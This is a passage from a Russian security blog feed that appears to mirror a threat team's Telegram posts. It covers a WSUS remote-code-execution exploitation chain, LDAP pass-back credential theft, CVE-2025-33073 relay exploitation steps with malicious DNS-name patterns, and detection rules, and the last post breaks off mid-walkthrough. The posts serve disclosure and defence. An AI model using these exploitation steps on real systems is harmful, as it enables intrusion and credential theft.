<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">
echo "install algif_aead /bin/false" &gt; /etc/modprobe.d/disable-algif-aead.conf

rmmod algif_aead 2&gt;/dev/null</code></span></pre><br />
<br />
<span class="hashtag">#cve</span> <span class="hashtag">#tip</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Путаница в уязвимостях WSUS: ставим все на свои места</title>
		<link>/wsus-vulnerability-confusion-setting-the-record-straight/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 17 Apr 2026 15:13:06 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[nuclei]]></category>
		<category><![CDATA[offensive]]></category>
		<category><![CDATA[wsus]]></category>
		<guid isPermaLink="false">/%d0%bf%d1%83%d1%82%d0%b0%d0%bd%d0%b8%d1%86%d0%b0-%d0%b2-%d1%83%d1%8f%d0%b7%d0%b2%d0%b8%d0%bc%d0%be%d1%81%d1%82%d1%8f%d1%85-wsus-%d1%81%d1%82%d0%b0%d0%b2%d0%b8%d0%bc-%d0%b2%d1%81%d0%b5-%d0%bd%d0%b0/</guid>

					<description><![CDATA[Путаница в уязвимостях WSUS: ставим все на свои места 🕷 Одной из самых актуальных уязвимостей в Windows Server Update Services (WSUS) стала критическая ошибка с идентификатором CVE-2025-59287 и оценкой CVSS 9.8. Она…]]></description>
										<content:encoded><![CDATA[<p><strong>Путаница в уязвимостях WSUS: ставим все на свои места</strong> 🕷</p>
<p>Одной из самых актуальных уязвимостей в Windows Server Update Services (WSUS) стала критическая ошибка с идентификатором CVE-2025-59287 и оценкой CVSS 9.8. Она связана с десериализацией недоверенных данных в службе обновления Windows Server и позволяет неавторизованному удаленному злоумышленнику выполнить код на сервере, отправив специально сформированное событие.</p>
<p>В <a href="https://hawktrace.com/blog/cve-2025-59287/" target="_blank" rel="noopener">разборах эксплуатации</a> шаги были указаны некорректно, так как их взяли из статьи. Однако позже авторы сами ее исправили и указали, что разбор относится к CVE-2023-35317, тогда как анализ CVE-2025-59287 перенесли <a href="https://hawktrace.com/blog/cve-2025-59287-unauth/" target="_blank" rel="noopener">в отдельную статью.</a></p>
<p>Это вызвало путаницу в многочисленных репостах, поэтому мы решили расставить все точки над i и заодно показать, как атакующий может восстановить оснастку после эксплуатации уязвимости.</p>
<p>❗️ <strong>Напомним технические детали эксплуатации</strong></p>
<p><strong>Условия для эксплуатации:</strong></p>
<p>• Сервер Windows с включенной ролью WSUS Server (по умолчанию отключена)<br />
• Неустановленные обновления <code>KB5070879</code> / <code>KB5070881</code> / <code>KB5070882</code> / <code>KB5070883</code> / <code>KB5070884</code> / <code>KB5070886</code> / <code>KB5070887</code><br />
• Сетевой доступ к портам <code>8530</code> (HTTP) или <code>8531</code> (HTTPS)<br />
• Учетные данные не требуются</p>
<p><strong>Техническая цепочка эксплуатации:</strong></p>
<p>1️⃣ <strong>Получение конфигурации</strong> — злоумышленник отправляет запрос к <code>/ReportingWebService/ReportingWebService.asmx</code> для получения ServerID (<em>скриншот 1</em>)</p>
<p>2️⃣ <strong>Извлечение cookies</strong> — используя ServerID, выполняется запрос к <code>/SimpleAuthWebService/SimpleAuth.asmx</code> для получения <code>AuthorizationCookie</code> (<em>скриншот 2</em>)</p>
<p>3️⃣ Получение криптографических данных — запрос к <code>/ClientWebService/Client.asmx</code> для извлечения временных меток и зашифрованной нагрузки (<em>скриншот 3</em>)</p>
<p>4️⃣ <strong>Доставка полезной нагрузки</strong> — финальный запрос отправляет событие с вредоносным сериализованным объектом, созданным через <code>ysoserial.net</code> с гаджетом <code>TextFormattingRunProperties</code>, с использованием события <code>SynchronizationCompletedCancel</code> (скриншот 4)</p>
<p>При обработке события с ID 389 (<code>SynchronizationCompletedCancel</code>) WSUS пытается десериализовать XML с телом ошибки, что приводит к выполнению произвольного кода.</p>
<p>Также в процессе эксплуатации регистрируется ложный узел с указанным DNS, в рамках которого отправляется событие. Этот процесс легко автоматизировать — например, с помощью шаблона Nuclei (<em>скриншот 5</em>). Восстановление оснастки после тестирования — <em>на скриншоте 6</em>.</p>
<p>🗿 <strong>После успешной эксплуатации оснастка WSUS ломается</strong>. Это происходит потому, что GUI при отображении узлов парсит их события, а у ложного узла событие повреждено и не поддается десериализации. В результате отображение узлов вызывает исключение и интерфейс перестает работать.</p>
<p>Для восстановления необходимо удалить вредоносное событие из таблицы <code>tbEventInstance</code> в базе данных SUSDB. Однако прямой доступ к БД есть только у привилегированных пользователей, а служба WSUS часто запущена от имени <code>Network Service</code>.</p>
<p>При этом служба WSUS имеет доступ к функциям, используемым в оснастке, поэтому пользователь, от имени которого получена сессия (даже <code>Network Service</code>), может управлять зарегистрированными узлами. Это позволяет безопасно завершить эксплуатацию и сразу восстановить оснастку.</p>
<pre><code>$wsus = Get-WsusServer

Get-WsusComputer -NameIncludes "test1337.test.local" | ForEach-Object {
    $wsus.GetComputerTarget($_.Id).Delete()
}</code></pre>
<p><strong>Эта команда выполняет две важные функции:</strong></p>
<p>• Удаляет зарегистрированный ложный узел из базы данных WSUS<br />
• Автоматически очищает связанное с ним событие с ID 389, использованное для доставки полезной нагрузки</p>
<p>🧐 <strong>Почему это важно:</strong> без очистки в WSUS остаются артефакты — ложный узел и события в логах, что может нарушить нормальную работу службы.</p>
<p>Эта уязвимость демонстрирует, как критические компоненты инфраструктуры могут становиться точкой входа для злоумышленников. При проведении тестирования на проникновение важно не только атаковать, но и корректно восстанавливать систему после эксплуатации.</p>
<p><strong>Рекомендации по защите</strong></p>
<p>• <strong>Установите обновления</strong> — <code>KB5070879</code> / <code>KB5070881</code> / <code>KB5070882</code> / <code>KB5070883</code> / <code>KB5070884</code> / <code>KB5070886</code> / <code>KB5070887</code> в зависимости от версии Windows Server</p>
<p>• <strong>Ограничьте сетевой доступ</strong> — WSUS не должен быть доступен из интернета. Используйте сегментацию сети для ограничения доступа только доверенным подсетям</p>
<p>• <strong>Если невозможно обновить</strong> — временно отключите роль WSUS Server или заблокируйте порты <code>8530</code> / <code>8531</code> до установки патчей</p>
<p><span class="hashtag">#offensive</span> <span class="hashtag">#nuclei</span> <span class="hashtag">#wsus</span> <span class="hashtag">#cve</span><br />
<a href="https://t.me/ptescalator" target="_blank" rel="noopener">@ptescalator</a> (<a href="https://x.com/ptescalator" target="_blank" rel="noopener">X,</a> <a href="https://max.ru/join/V8dhsWy0FytLHcY_2m9KM99gsnBlr0v5RxOZFTOClho" target="_blank" rel="noopener">Max</a>)</p>
<figure class="wp-block-image"><img fetchpriority="high" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/04/photo_545@17-04-2026_15-13-06-1024x603.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/04/photo_545@17-04-2026_15-13-06-1024x603.jpg 1024w, /wp-content/uploads/2026/04/photo_545@17-04-2026_15-13-06-300x177.jpg 300w, /wp-content/uploads/2026/04/photo_545@17-04-2026_15-13-06-768x453.jpg 768w, /wp-content/uploads/2026/04/photo_545@17-04-2026_15-13-06-1536x905.jpg 1536w, /wp-content/uploads/2026/04/photo_545@17-04-2026_15-13-06-2048x1207.jpg 2048w" alt="" width="1024" height="603" /></figure>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/04/photo_546@17-04-2026_15-13-06-1024x603.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/04/photo_546@17-04-2026_15-13-06-1024x603.jpg 1024w, /wp-content/uploads/2026/04/photo_546@17-04-2026_15-13-06-300x177.jpg 300w, /wp-content/uploads/2026/04/photo_546@17-04-2026_15-13-06-768x453.jpg 768w, /wp-content/uploads/2026/04/photo_546@17-04-2026_15-13-06-1536x905.jpg 1536w, /wp-content/uploads/2026/04/photo_546@17-04-2026_15-13-06-2048x1207.jpg 2048w" alt="" width="1024" height="603" /></figure>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/04/photo_547@17-04-2026_15-13-06-1024x603.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/04/photo_547@17-04-2026_15-13-06-1024x603.jpg 1024w, /wp-content/uploads/2026/04/photo_547@17-04-2026_15-13-06-300x177.jpg 300w, /wp-content/uploads/2026/04/photo_547@17-04-2026_15-13-06-768x453.jpg 768w, /wp-content/uploads/2026/04/photo_547@17-04-2026_15-13-06-1536x905.jpg 1536w, /wp-content/uploads/2026/04/photo_547@17-04-2026_15-13-06-2048x1207.jpg 2048w" alt="" width="1024" height="603" /></figure>
<figure class="wp-block-image"><img loading="lazy" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/04/photo_548@17-04-2026_15-13-06-1024x468.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/04/photo_548@17-04-2026_15-13-06-1024x468.jpg 1024w, /wp-content/uploads/2026/04/photo_548@17-04-2026_15-13-06-300x137.jpg 300w, /wp-content/uploads/2026/04/photo_548@17-04-2026_15-13-06-768x351.jpg 768w, /wp-content/uploads/2026/04/photo_548@17-04-2026_15-13-06-1536x702.jpg 1536w, /wp-content/uploads/2026/04/photo_548@17-04-2026_15-13-06-2048x936.jpg 2048w" alt="" width="1024" height="468" /></figure>
<figure class="wp-block-image"><img loading="lazy" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/04/photo_549@17-04-2026_15-13-06-1024x468.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/04/photo_549@17-04-2026_15-13-06-1024x468.jpg 1024w, /wp-content/uploads/2026/04/photo_549@17-04-2026_15-13-06-300x137.jpg 300w, /wp-content/uploads/2026/04/photo_549@17-04-2026_15-13-06-768x351.jpg 768w, /wp-content/uploads/2026/04/photo_549@17-04-2026_15-13-06-1536x702.jpg 1536w, /wp-content/uploads/2026/04/photo_549@17-04-2026_15-13-06-2048x936.jpg 2048w" alt="" width="1024" height="468" /></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How to CVE-2025-54916? Low-effort vulnerability research</title>
		<link>/how-to-cve-2025-54916-low-effort-vulnerability-research/</link>
		
		<dc:creator><![CDATA[author_vr]]></dc:creator>
		<pubDate>Mon, 15 Sep 2025 11:41:37 +0000</pubDate>
				<category><![CDATA[Vulnerability Research]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[escvr]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">http://localhost:8080/how-to-cve-2025-54916-low-effort-vulnerability-research/</guid>

					<description><![CDATA[How to CVE-2025-54916? Low-effort vulnerability research 💻 Привет, на связи ESC-VR. Формат поста в телеграме редко подходит для разборов комплексных уязвимостей, но баг, найденный нами в недрах NTFS, исправленный сентябрьским патчем, можно…]]></description>
										<content:encoded><![CDATA[<strong>How to CVE-2025-54916? Low-effort vulnerability research</strong> 💻<br />
<br />
Привет, на связи ESC-VR.<br />
<br />
Формат поста в телеграме редко подходит для разборов комплексных уязвимостей, но баг, найденный нами в недрах NTFS, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54916" rel="noopener" target="_blank">исправленный сентябрьским патчем</a>, можно было найти весьма необычным способом (<em>и мы смогли уложить рассказ об этом в пост</em>).<br />
<br />
Если вы интересуетесь анализом уязвимостей, наверняка слышали про CodeQL, SonarQube, Snyk, Semgrep — классические SAST-системы. Их общий минус: чаще всего нужен полный доступ к исходникам. Когда его нет, ценность таких инструментов быстро стремится к нулю, а сложность запросов мешает применять их к декомпилированным листингам или фрагментам кода.<br />
<br />
Нужно что-то простое, с понятным языком запросов и без требования полной кодовой базы. Такое решение есть — это <a href="https://github.com/weggli-rs/weggli" rel="noopener" target="_blank">weggli-rs</a>: интерактивная, консольная утилита для выполнения семантического поиска. Она подходит для поиска по декомпилированным листингам и частичным кодовым базам.<br />
<br />
Что мы называем «частичными кодовыми базами»? Например, утекшие исходники Windows XP SP1, <a href="https://www.zdnet.com/article/windows-xp-leak-confirmed-after-user-compiles-the-leaked-code-into-a-working-os/" rel="noopener" target="_blank">слитые</a> в 2020 году. Несмотря на возраст, это бесценный источник знаний о внутренностях современной Windows.<br />
<br />
🎯 <strong>Наша цель:</strong> найти классические переполнения стека через вызовы <code>memcpy</code>/<code>memmove</code>. Ищем функцию, где:<br />
<br />
• на стеке объявлен буфер;<br />
• есть вызов <code>memcpy</code>/<code>memmove</code>;<br />
• в первый аргумент передается адрес этого стекового буфера.<br />
<br />
Этого достаточно, чтобы собрать множество кандидатов на stack buffer overflow (не все, но многие). Запрос на weggli:<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">weggli <span class="hljs-literal">-R</span> <span class="hljs-string">"<span class="hljs-variable">$func</span>=RtlCopyMemory|memmove|memcpy"</span> <span class="hljs-string">"_ <span class="hljs-variable">$v</span>; <span class="hljs-variable">$func</span>(&amp;<span class="hljs-variable">$v</span>,_,_)"</span>
</code></span></pre><br />
<br />
Дальше нужно сужать выборку. Например, требуем, чтобы размер копируемого буфера задавался выражением с вычитанием. Таким образом мы подсвечиваем места с риском целочисленного underflow:<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">weggli.exe <span class="hljs-literal">-R</span> <span class="hljs-string">"<span class="hljs-variable">$func</span>=RtlCopyMemory|memmove|memcpy"</span> <span class="hljs-string">"_ <span class="hljs-variable">$v</span>; <span class="hljs-variable">$func</span>(&amp;<span class="hljs-variable">$v</span>,_,_(_-_))"</span>
</code></span></pre><br />
<br />
Уязвимость, закрытую в сентябре, можно было подсветить таким запросом:<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">weggli <span class="hljs-literal">-R</span> <span class="hljs-string">"<span class="hljs-variable">$func</span>=RtlCopyMemory|memmove|memcpy"</span> <span class="hljs-string">"_ <span class="hljs-variable">$v</span>; <span class="hljs-variable">$func</span>(&amp;<span class="hljs-variable">$v</span>,_,_(<span class="hljs-variable">$a</span>-&gt;<span class="hljs-variable">$b</span>))
</span></code></span></pre><br />
<br />
<strong>В данном шаблоне мы ищем все функции, в которых:</strong><br />
<br />
• на стеке объявлен буфер;<br />
• есть вызов <code>memcpy</code>/<code>memmove</code>;<br />
• в первый аргумент передается адрес этого стекового буфера;<br />
• размер копируемого буфера определяется полем какой бы то ни было структуры.<br />
<br />
В заключение мы призываем вас попробовать использовать weggli-rs и найти исправленную уязвимость в исходном коде Windows XP SP1.<br />
<br />
HINT: <span class="spoiler">кажется, искать нужно в base/fs, а в названии уязвимой функции было что-то связанное с записью в лог или еще куда</span> 😏<br />
<br />
А если вы хотите узнать, как стриггерить эту уязвимость, то ознакомьтесь с <a href="https://swarm.ptsecurity.com/buried-in-the-log-exploiting-a-20-years-old-ntfs-vulnerability/" rel="noopener" target="_blank">нашим предыдущим исследованием</a>, опубликованным в блоге PT SWARM.<br />
<br />
<span class="hashtag">#escvr</span> <span class="hashtag">#cve</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Уязвимости типа Pass Back: что это такое и насколько опасны</title>
		<link>/pass-back-vulnerabilities-what-they-are-and-how-dangerous-they-are/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 25 Jul 2025 16:04:34 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[offensive]]></category>
		<guid isPermaLink="false">/%d1%83%d1%8f%d0%b7%d0%b2%d0%b8%d0%bc%d0%be%d1%81%d1%82%d0%b8-%d1%82%d0%b8%d0%bf%d0%b0-pass-back-%d1%87%d1%82%d0%be-%d1%8d%d1%82%d0%be-%d1%82%d0%b0%d0%ba%d0%be%d0%b5-%d0%b8-%d0%bd%d0%b0%d1%81%d0%ba/</guid>

					<description><![CDATA[Уязвимости типа Pass Back: что это такое и насколько опасны 🧐 Есть целый класс уязвимостей, которые на первый взгляд выглядят безобидно, и даже уровень опасности у них низкий или средний. Но если…]]></description>
										<content:encoded><![CDATA[<p><strong>Уязвимости типа Pass Back: что это такое и насколько опасны</strong> 🧐</p>
<p>Есть целый класс уязвимостей, которые на первый взгляд выглядят безобидно, и даже уровень опасности у них низкий или средний. Но если разобраться в нюансах, то все уже не кажется таким безобидным.</p>
<p>Примером такой уязвимости является LDAP Pass Back (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-32122" rel="noopener" target="_blank">CVE-2024-32122</a>), которую <a href="https://t.me/Positive_Technologies/3652" rel="noopener" target="_blank">зарегистрировал</a> ведущий специалист отдела наступательной безопасности PT ESC <strong>Владислав Дриев</strong> совместно со специалистом по анализу защищенности УЦСБ <strong>Олегом Лабынцевым</strong>.</p>
<p>Эта уязвимость позволяет получить учетные данные (УД) от LDAP в открытом виде (зачастую это УЗ AD), злоумышленнику нужно лишь частично изменить конфигурацию коннектора. Уязвимость встречается в разных видах и в самых разных устройствах и программных продуктах. </p>
<p>Атакующий может получить УД в открытом виде или в виде хеша с захваченного устройства или софта. Ярким примером таких устройств, конечно, являются МФУ, но точно не ограничиваемся только ими. Уязвимыми также могут быть домофоны, камеры, сетевое оборудование. Если говорить про ПО, то чаще всего это CMS.</p>
<p><strong>В чем конкретно проблема</strong> 🤔</p>
<p>Проблема в том, что атакующий может влиять на конфигурацию устройства, в которой есть УД. Чтобы было еще понятнее, приведем пример. Настроили МФУ, чтобы оно могло отправлять сообщения по SMTP на почту, также настроили аутентификацию по LDAP, чтобы динамически загружался список контактов, а еще — SMB, чтобы сразу можно было складывать отсканированные документы в сетевую папку.</p>
<p>Далее рассмотрим ситуацию, когда атакующий смог получить доступ к веб-интерфейсу с помощью УД по умолчанию. В таком случае он может попробовать изменить IP-адрес конфигурации, которая содержит УД, поменяв в ней IP-адрес на подконтрольный ему. Что это даст и почему это вообще возможно? Опыт показывает, что в большинстве случаев смена только IP-адреса в конфигурации разрешена. Соответственно, УД будут использованы валидные. Таким образом, злоумышленник сможет получить обращение с корректными учетными данными на свой IP-адрес, где сможет достать их из трафика либо в открытом виде, либо в виде хеша.</p>
<p><strong>•</strong> SMTP (без TLS) зачастую позволяет получить УД в открытом виде.<br />
<strong>•</strong> LDAP позволяет получить данные в открытом виде.<br />
<strong>• </strong>SMB позволяет получить хеш (часто NetNTLMv1, с которого можно выполнить NTLM Relay).<br />
<strong>•</strong> другое (УД для IP-телефонии, которые обернуты в Base64).</p>
<p>Что здесь небезопасного, ведь доступ ко всем конфигам скрыт за аутентификацией? Да, но не всегда все так. Способы получения доступа к конфигурациям:</p>
<p><strong>•</strong> УД по умолчанию.<br />
<strong>•</strong> IDOR (выделен отдельно от уязвимостей, потому что встречается часто).<br />
<strong>• </strong>Уязвимость для получения доступа к веб-интерфейсу администратора.</p>
<p>Еще есть случаи, когда на устройстве работает несколько администраторов, у них разные роли, но при этом каждый может получить доступ к УД коннекторов через такой нехитрый способ.</p>
<p>Так или иначе атакующий получит доступ к устройству. После этого скомпрометирует УД и начнет развивать атаки на смежные сервисы, в частности на AD. Кроме того, среди этого всего бывают уникальные и выдающиеся случаи:</p>
<p><strong>•</strong> CMS работает с учетной записью администратора домена.<br />
<strong>•</strong> МФУ работает с учетной записью администратора домена.</p>
<p>В итоге уязвимость низкого или среднего уровня опасности может стать звеном в цепочке компрометации всей инфраструктуры.</p>
<p><strong>Итак, как этого избежать</strong> 🧐</p>
<p>Самый простой способ — при любом изменении конфигурации УД запросить ввести их заново. Если конфигурацию меняет администратор, для него это не будет проблемой. А если атакующий, то он ничего не получит. Понятно, что на софт не всегда можно повлиять, тогда перед тем, как войти под своей УЗ на какое-то новое устройство, можно самостоятельно проверить, как оно ведет себя с разными конфигурациями, нет ли возможности извлечь УД из него. </p>
<p>Более того, такие УЗ следует ограничивать в правах, брать на мониторинг. Если от имени УЗ началась разведка в домене — это явный признак компрометации устройства. Ну и конечно, нужно защищать устройства и ПО: менять пароли по умолчанию, регулярно устанавливать обновления.</p>
<p><span class="hashtag">#CVE</span> <span class="hashtag">#offensive</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Детектирование CVE-2025-33073</title>
		<link>/detection-of-cve-2025-33073/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 27 Jun 2025 17:40:56 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[rules]]></category>
		<category><![CDATA[sigma]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d0%b2-%d0%bf%d1%80%d0%be%d0%b4%d0%be%d0%bb%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5/</guid>

					<description><![CDATA[В продолжение предыдущих публикаций рассказываем, как обнаруживать уязвимость CVE-2025-33073 🕵️‍♂️ 1️⃣ Отслеживать DNS-запросы с Marshalled-суффиксом В атаках Reflection Relay злоумышленник вынуждает службы выполнять DNS-запросы к поддельным именам с паттерном 1UWhRCA + 37–45…]]></description>
										<content:encoded><![CDATA[<p><strong>В продолжение </strong><a href="https://t.me/ptescalator/389" rel="noopener" target="_blank">предыдущих публикаций</a><strong> рассказываем, как обнаруживать уязвимость CVE-2025-33073</strong> 🕵️‍♂️</p>
<p>1️⃣<strong> Отслеживать DNS-запросы с Marshalled-суффиксом</strong></p>
<p>В атаках Reflection Relay злоумышленник вынуждает службы выполнять DNS-запросы к поддельным именам с паттерном <code>1UWhRCA</code> + 37–45 символов Base64. Записи вида <code>srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.example.com</code> или <code>localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.example.com</code> — индикаторы попытки Reflection Relay (NTLM, Kerberos).</p>
<p><strong>• Что мониторить</strong></p>
<p>Все DNS-запросы, где имя узла заканчивается на marshalled-часть (<code>1UWhRCA</code> + 37-45 символов Base64).</p>
<p><strong>• События</strong></p>
<p>Sysmon Event ID 22 (DNS-запросы на узлах).</p>
<p>События DNS-серверов, содержащие такие запросы.</p>
<p>2️⃣<strong> Ловить LDAP-поиск с marshalled-суффиксом</strong></p>
<p>Reflection Relay вызывает LDAP-запросы от атакуемого узла к контроллеру домена, в которых параметр <code>name= </code>содержит поддельное DNS-имя формата <code>[имя_узла]1UWhRCA[Base64]</code>. Это происходит при выполнении Relay-атаки обратно на жертву.</p>
<p><strong>• Что мониторить:</strong></p>
<p>Запросы LDAP, в которых параметр <code>name=</code> содержит конструкцию: <br />
<code>&quot;[имя_хоста]1UWhRCA[символы Base64]&quot;</code></p>
<p><strong>• События: </strong></p>
<p>Windows Security Event 1644 (&quot;A search was performed in Active Directory&quot;) на контроллерах домена.</p>
<p>3️⃣<strong> Знать механику CVE-2025-33073 и Coerce-атаки</strong></p>
<p><strong>Как работает уязвимость:</strong></p>
<p>• Coerce-атаки (PetitPotam, PrinterBug) вынуждают жертву подключиться к поддельному DNS-имени.<br />
• Windows ошибочно считает запрос локальным из-за marshalled-суффикса, отключая проверки NTLM и Kerberos.<br />
• Это позволяет атакующему выполнить Relay сессии обратно на жертву для получения RCE с правами SYSTEM.</p>
<p><strong>Примеры Coerce-атак:</strong></p>
<p><strong>• PetitPotam:</strong> принуждение через уязвимость в EFS RPC, заставляющее LSASS инициировать аутентификацию;<br />
<strong>• PrinterBug:</strong> принудительная отправка NTLM-хешей через уязвимость в службе печати Windows (MS-RPRN).</p>
<p>4️⃣ <strong>Опираться на примеры сработавших правил корреляции</strong></p>
<p>При реализации CVE-2025-33073 совместно с PetitPotam для дампа учетных данных сработали следующие правила корреляции:</p>
<p><strong>• Coerce_Auth: </strong>правило обнаруживает Coerce-атаки на узел с целью перехвата хеша машинной учетной записи атакованного узла, а также пытается определить по названию используемого пайпа, какая техника атаки используется (netdfs = DFSCoerce; spoolss = PrinterBug; fssagentrpc = ShadowCoerce; efsrpc, lsarpc, samr, lsass, netlogon = PetitPotam; msftewds = WSPCoerce) и какой инструмент применяется.</p>
<p><strong>• SVCCTL_Connection:</strong> правило обнаруживает подключение к именованному каналу <code>svcctl</code>, который ответственен за удаленное конфигурирование служб Windows на узлах через Service Control Manager, что может привести к выполнению произвольного кода;</p>
<p><strong>•</strong> <strong>Remote_Password_Dump:</strong> правило обнаруживает удаленный дамп паролей через обращение к именованному каналу <code>WINREG</code>.</p>
<p>5️⃣ <strong>Использовать примеры SIGMA-правил</strong></p>
<p>Если у вас нет MaxPatrol SIEM, то вот вам пример простых SIGMA-правил:</p>
<p><a href="https://telegra.ph/SIGMA-pravilo-dlya-Sysmon-Event-ID-22-06-27" rel="noopener" target="_blank">Для Sysmon Event ID 22</a>.</p>
<p><a href="https://telegra.ph/SIGMA-pravilo-dlya-Windows-Security-Event-1644-06-27" rel="noopener" target="_blank">Для Windows Security Event 1644</a>.</p>
<p>6️⃣ <strong>Использовать наши публичные Suricata-</strong><a href="https://rules.ptsecurity.com/view/rules/ptopen-windows.rules#L53" rel="noopener" target="_blank">сигнатуры</a><strong> </strong>для обнаружения этой атаки</p>
<figure class="wp-block-image"><img width="1024" height="783" src="/wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-1024x783.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-1024x783.jpg 1024w, /wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-300x229.jpg 300w, /wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-768x587.jpg 768w, /wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="730" src="/wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-1024x730.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-1024x730.jpg 1024w, /wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-300x214.jpg 300w, /wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-768x548.jpg 768w, /wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56.jpg 1063w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#detect</span> <span class="hashtag">#cve</span> <span class="hashtag">#win</span> <span class="hashtag">#sigma</span> <span class="hashtag">#rules</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Эксплуатация CVE-2025-33073</title>
		<link>/exploitation-of-cve-2025-33073/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 24 Jun 2025 18:12:48 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[offensive]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%82%d0%b5%d0%bf%d0%b5%d1%80%d1%8c-%d0%bf%d1%80%d0%be-%d1%8d%d0%ba%d1%81%d0%bf%d0%bb%d1%83%d0%b0%d1%82%d0%b0%d1%86%d0%b8%d1%8e/</guid>

					<description><![CDATA[🧤 Теперь про эксплуатацию уязвимости CVE-2025-33073: • Учетная запись в домене с самыми рядовыми привилегиями. • На атакуемом устройстве не настроено принудительное требование подписи SMB. • На атакуемом устройстве не стоит патч,…]]></description>
										<content:encoded><![CDATA[<p>🧤 <strong>Теперь про эксплуатацию </strong><a href="https://t.me/ptescalator/389" rel="noopener" target="_blank">уязвимости</a><strong> CVE-2025-33073:</strong></p>
<p>• Учетная запись в домене с самыми рядовыми привилегиями.<br />
• На атакуемом устройстве не настроено принудительное требование подписи SMB.<br />
• На атакуемом устройстве не стоит патч, устраняющий уязвимость CVE-2025-33073, который был выпущен в июне 2025 года.</p>
<p>И дополнительно одно из двух:</p>
<p>• Либо возможность регистрации DNS-записи в домене (по умолчанию могут все пользователи домена).<br />
• Либо нахождение в одной широковещательной сети с атакуемым устройством (проведение атаки NBNS, LLMNR и mDNS-спуфинга).</p>
<p>Рассмотрим два варианта эксплуатации с дампом локальных учетных данных из <code>SAM</code> и <code>SECURITY</code>. </p>
<p>1️⃣ <strong>Первый вариант с DNS-записью </strong><em>(</em><a href="https://sun9-63.userapi.com/s/v1/if2/FUPFSkgw31jScZIbAjTPBLP0Sqh4fyjiiC7fJ2uTJJn9J8l2TMVzqc2aPnaliociGexQCU3pXf0pClC8173EdThC.jpg?quality=95&#038;as=32x18,48x27,72x41,108x61,160x91,240x137,360x205,480x273,540x307,640x364,720x410,1080x615,1280x729,1440x820,2342x1333&#038;from=bu&#038;cs=2342x0" rel="noopener" target="_blank">скриншот 1</a><em>)</em>:</p>
<p>1. Атакующий регистрирует DNS-запись формата <code>localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA</code></p>
<p>2. Атакующий выполняет Coerce-атаку на устройство без SMB Signing.</p>
<p>3. Устройство разрешает имя по DNS, в котором получает IP-адрес атакующего.</p>
<p>4. Устройство проходит аутентификацию на сервере атакующего.</p>
<p>5. Атакующий выполняет Relay-атаку на это же устройство, получает аутентифицированную сессию с правами SYSTEM.</p>
